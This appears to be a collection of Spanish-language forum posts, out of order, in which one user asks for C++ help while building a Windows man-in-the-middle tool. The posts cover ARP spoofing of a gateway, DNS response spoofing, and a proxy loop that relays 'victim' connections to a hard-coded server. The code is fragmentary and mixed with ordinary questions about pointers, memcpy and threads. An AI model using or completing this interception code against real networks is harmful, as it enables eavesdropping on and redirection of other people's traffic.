Ahh vale, estaba cambiandolo por variables estaticas u_char[6] etc, pero no creo que sea buena idea, ¿como puedo hacer para que me diga el tamaño de lo que apunta el puntero? XP porque con sizeof(*mac) me sale uno el primer elemento, pero para que me diga el tamaño de todos como se puede hacer?.

Gracias como siempre, un saludo.

Edito: Parece que no se puede, hay que hacer una variable estatica y pasar su dirección al puntero, luego ¿la unica solucion es multiplicar por 2 las variables declaradas?.

porque ahora habra:

 u_char mac[6]; u_char *pmac; pmac = &(mac[0]); ...

Y me parece una caca tremenda XD.

Bueno parece que sustituyendo los punteros por esto:

&(mac_gateway[0])

Se soluciona parcialmente el problema, pero esto no lo consigo solucionar:

&(ip_atacante[0]) = (u_char*)&num_atacante;

ERROR: La expresion debe tener valor L modificable.

Solución:

memcpy(&(ip_atacante[0]), (u_char*)&num_atacante, sizeof(u_char)* 4);
		memcpy(&(ip_gateway[0]), (u_char*)&num_gateway, sizeof(u_char)* 4);
		memcpy(&(mac_atacante[0]), (u_char*)adaptador->Address, sizeof(u_char)* 6);

Así funciona, ¿os parece  buena idea? O es mala calidad de código?

No, es de 64 bits

Resulta que al hacer sizeof(mac), obtengo 4 bytes, cuando una mac tiene 6 bytes, uno para cada u_char si no me equivoco.

u_char *mac_gateway = new u_char[6]();
 
		u_long num_gateway = inet_addr(adaptador->GatewayList.IpAddress.String);
 
 
		if (num_gateway == INADDR_NONE){
			Sleep(REINTENTAR_MITM * 1000);
			continue;
		}
 
		if (!enviar_arp(adaptador->GatewayList.IpAddress.String,
			adaptador->IpAddressList.IpAddress.String, mac_gateway)){
			Sleep(REINTENTAR_MITM/2 * 1000);
			continue;
		}
 
		for (int i = 0; i < 6; i++)
			printf("%d=%x ", i,mac_gateway[i]); 
 
		system("pause");
 
		for (int i = 0; i < 4; i++)
			printf("%d=%x ", i, ip_gateway[i]);
		system("pause");
		cout << sizeof(mac_gateway) << sizeof(mac_atacante);

Me salen que todas las macs tienen 4 bytes WTF, la ip son 4 bytes, pero las macs no se supone que tienen 6?.

Me he quedado un poco loco con esto. Haber si sabéis algo.

Gracias, un saludo.

Edito: Que broma es esta:

u_char *mac = new u_char[500]();
cout << sizeof(mac);

Hola ivancea, gracias por la respuesta era justo lo que quería saber, no estaba seguro de que creará los subthreads pues en el administrador de tareas no aparecen que es donde los buscaba, y hasta ahora desconocia que existía el monitor de recursos.

Saludos.

Hola a todos, necesito hacer 2 cosas con los paquetes dns response.

Primera: modificar todos sus campos de ip, para poder hacer dns spoofing, para ello hay que saber en que posición están los bytes de las ips.

Segunda: obtener el dominio que contienen y la ip real del mismo. Para ello necesito saber donde estan los bytes del dominio y de la ip real.

Con el wireshark he ido probando y es bastante jodido. De momento solo quiero extraer el dominio y la ip que me da el dns response, puede haber más de uno, y cada campo con distintos tamaños (locura).

(C++): En construcción.. A ver quien consigue calcularme el tamaño de cada query y response dns.

Saludos.

Edito: Lo que me rompió los esquemas fueron las "answers", que parecía que siempre tenían 16 bytes, hasta que pumm, había una que incluía el dominio en ella, me refiero al atributo CNAME: ... ,entonces todo se vino abajo. ¿se puede saber si van a incluir el dominio o no? Se puede observar que solo la primera answer lleva el CNAME, las demás no, es como resolver una ecuación de 100 incognitas XD.

Edito: Quizás este proyecto pueda ayudarme:

https://github.com/maurotfilho/dns-spoof/blob/master/dns-spoof.c

Ya se a que "threads" te refieres y no son los "autenticos", ya que la clase thread no me crea un subthread.

He creado threads en C# y al ver mi app corriendo en el administrador de tareas me salian varios subthreads (los que había creado).

Sin embargo con C++ hice la prueba de hacer varias clases threads que ejecutaran funciones como en C# hacían y en el administrador de tareas no salía más que uno, y ningún subthread.

Luego la clase thread es lo mismo que auto x = async()... etc que ejecutan un poco uno y luego el otro y así, y no son thread al menos a los que me refiero. Si hay varios de esos el programa no daria a basto necesita un subproceso, otro programa independiente para no cargar tanto el proceso en ejecucion, dividirlo en varios procesos.

Saludos

Parece que esto es a lo que me refería:

https://msdn.microsoft.com/en-us/library/windows/desktop/ms682516(v=vs.85).aspx

Saludos.

Jajaja la muerte.

if ((victima = accept(servidor, (struct sockaddr*)&addr, &len)) == INVALID_SOCKET){
				closesocket(victima);
				Sleep(100);
				continue;
			}

Despues de esto (la conexión) podría abrir un thread pasando el socket "victima", y que interactue con el. Y haga lo demás que hay en el bucle en el otro thread.

Luego al acabar el proceso ese thread moriría.

También para colmo tengo que ir a la lista (con el ** mutex) y obtener el ultimo dominio que redirigí al usuario pues cuando llega la petición al server y la voy a reenviar no tengo ni la ip destino correcta ni el dominio en el paquete, luego... tengo que pasarselo de la lista, muchos subthreads, muchos mutex, muerte y destrucción jajaja.

Cada vez lo veo menos viable, pero no se me ocurre otra manera de reestructurarlo.

Saludos.

Hola, tengo un problema con el MITM, cuando las victimas se van a conectar a mi servidor el servidor recibe la respuesta y reenvia la petición al servidor destino a través de un send(), luego recibe la respuesta de ese servidor y la reenvía la víctima tal cual.

El problema es que cuando haya 30 víctimas ¿como tendré que programar esto?, ¿tendría que crear un subproceso para cada cliente conectado al servidor? ¿sería viable? ¿alguna otra posible solución?.

Os dejo el code, que cambiaríais??.

while (*on_mitm){
 
			int victima;
			sockaddr_in addr;
			addr.sin_family = AF_INET;
			int len = sizeof(addr);
 
			if ((victima = accept(servidor, (struct sockaddr*)&addr, &len)) == INVALID_SOCKET){
				closesocket(victima);
				Sleep(100);
				continue;
			}
			else{
				cout << "conectadoo";
				setsockopt(victima, SOL_SOCKET, SO_RCVTIMEO, (char*)&tiempo_espera, sizeof(timeval));
				setsockopt(victima, SOL_SOCKET, SO_SNDTIMEO, (char*)&tiempo_espera, sizeof(timeval));
 
				u_char *ip_victima = new u_char[4]();
				u_long num_victima = inet_addr(inet_ntoa(addr.sin_addr));
 
				if (num_victima == INADDR_NONE){
					closesocket(victima);
					Sleep(100);
					break;
				}
 
				ip_victima = (u_char*)&num_victima;//busco en la lista ultima.
 
				string respuesta;
				char *bloque = new char[3000]();
				setsockopt(victima, SOL_SOCKET, SO_RCVTIMEO, (char*)&tiempo_espera, sizeof(timeval));
				while (int res = recv(victima, bloque, 3000, 0) > 0)
					respuesta += string(bloque);
 
				cout << "recibido";
				if (respuesta.length() == 0){
					closesocket(victima);
					Sleep(100);
					break;
				}
 
				int cliente;
				sockaddr_in cli_local;
 
				cout << respuesta << endl;
				respuesta = eliminar_encoding(respuesta, true);
				cout << respuesta << endl;
 
				if ((cliente = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR){
					cout << "falla socket" << GetLastError();
					Sleep(REINTENTAR_PROXY * 1000);
					continue;
				}
 
				cli_local.sin_family = AF_INET;
				cli_local.sin_port = htons(80);
				cli_local.sin_addr.s_addr = inet_addr("217.160.43.9");
 
				if (connect(cliente, (struct sockaddr*)&cli_local, sizeof(cli_local)) == SOCKET_ERROR){
					cout << "error conectar" << GetLastError();
					closesocket(cliente);
				}
				else{
					if (send(cliente, respuesta.c_str(), respuesta.length(), 0) == SOCKET_ERROR){
						cout << "error enviar" << GetLastError();
						closesocket(cliente);
					}
					else{
						respuesta = "";
						while (recv(cliente, bloque, 3000, 0) > 0)
							respuesta += string(bloque);
 
						if (respuesta.length() == 0){
							closesocket(cliente);
							closesocket(victima);
							Sleep(100);
							break;
						}
 
						cout << "respuesta server: " << respuesta << endl;
						respuesta = eliminar_encoding(respuesta, false);
						cout << respuesta << endl;
 
						if (send(victima, respuesta.c_str(), respuesta.length(), 0) == SOCKET_ERROR)
							cout << "fallo reenvio a cliente " << GetLastError();
						else
							cout << "se envio al cliente"; 
					}
				}
			}
			Sleep(100);
		}

Saludos.

Si eso hago todas las funciones y subthreads que usan la lista de usuarios que es comun a todas ellas las corro en una función, donde la lista de usuarios es un atributo.

Cuando alguien la modifica antes de eso llamo al mutex, pero es un lío horrible, a veces va mejor cuando no pongo mutex XD.

Busqué acerca de los auténticos threads y los encontré:

https://msdn.microsoft.com/en-us/library/windows/desktop/ms682453(v=vs.85).aspx

Pero no es exactamente lo que pensaba, ¿como puedo ejecutar una función de mi programa en otro proceso aparte?, ¿algúen ejemplo?.

Gracias, saludos.

Si es correcto.

Ya solo sería configurar el timeout  de descarga recv() y subida send() para cada red.
 
Saludos.